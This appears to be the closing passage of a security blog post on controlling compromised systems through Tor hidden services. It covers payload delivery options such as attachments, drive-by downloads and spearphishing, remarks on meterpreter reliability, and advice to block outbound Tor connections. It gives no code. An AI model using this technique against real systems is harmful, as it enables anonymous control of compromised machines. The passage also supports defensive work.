  • There are obviously a number of variations possible for this approach; for example, the payload could be delivered as an email attachment, or loaded onto another compromised web server as a drive-by download or spearphishing destination.  In any case, if the compromised system is able to establish an outbound connection to Tor then the system can become a hidden server, and can be controlled via this hidden service.  If you are an administrator and you want to avoid this happening to your systems, you need to ensure that they are not able to establish a connection to the Tor network.
  • It is a real shame that more security tools don’t have native support for SOCKS4a; having to use socat is a real pain.  It would be awesome to see real SOCKS support in, say, Metasploit, Nessus, Nmap, …
  • While I am on “wishlist” items, it would also be really good to see Linux meterpreter get a whole lot better. When I started tinkering with this method, I burnt a lot of time trying to get it working with meterpreter on a Linux x86 target – my success rate was something like 1 in 20, or 1 in 30.  The payload and stager seem to be either unstable or intolerant of the network delays that Tor can bring.

TLDR:

If a compromised system can establish a connection to the Tor network, it can be used to host a hidden service of the attackers choosing.  This hidden service can be accessed anonymously via Tor.

– @dave_au